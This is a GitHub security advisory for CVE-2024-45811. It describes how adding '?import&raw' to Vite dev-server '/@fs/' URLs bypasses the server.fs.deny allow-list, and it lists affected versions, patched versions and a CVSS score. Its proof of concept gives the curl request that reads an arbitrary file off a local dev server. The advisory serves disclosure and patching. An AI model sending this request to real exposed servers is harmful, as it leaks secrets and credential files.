
server.fs.deny bypassed when using ?import&raw

Moderate
patak-dev published GHSA-9cwx-2883-4wfx Sep 17, 2024

Package

vite (npm)

Affected versions

>=5.4.0, <=5.4.5
>=5.3.0, <=5.3.5
>=5.0.0, <=5.2.13
>=5.0.0, <=5.1.7
>=4.0.0, <=4.5.3
<=3.2.10

Patched versions

>=5.4.6
>=5.3.6, <5.4.0
>=5.2.14, <5.3.0
>=5.1.8, <5.2.0
>=4.5.5, <5.0.0
>=3.2.11, <4.0.0

Description

Summary

The Vite development server can be made to return the contents of arbitrary files readable by the server process to the browser, bypassing the server.fs.deny / allow-list restriction.

Details

The /@fs/ endpoint of the Vite dev server refuses to serve files outside the serving allow list (server.fs.allow, with server.fs.deny applied on top), answering with 403 Restricted. Appending ?import&raw to the same URL routes the request through the import/transform pipeline instead, which reads the file as a raw import and returns its contents as a JavaScript module (export default "...") without applying that check, provided the file exists. Only the development server is affected, and it listens on localhost unless server.host / --host exposes it; the CVSS metrics below (adjacent attack vector, user interaction required) reflect that.

PoC

$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# allow-list check bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...

Severity

Moderate

CVSS overall score

4.8 / 10 (CVSS v3.1 base score, computed from the vector string below)

CVSS v3 base metrics

Attack vector: Adjacent
Attack complexity: High
Privileges required: None
User interaction: Required
Scope: Unchanged
Confidentiality: High
Integrity: None
Availability: None

Vector string

CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

CVE ID

CVE-2024-45811

Credits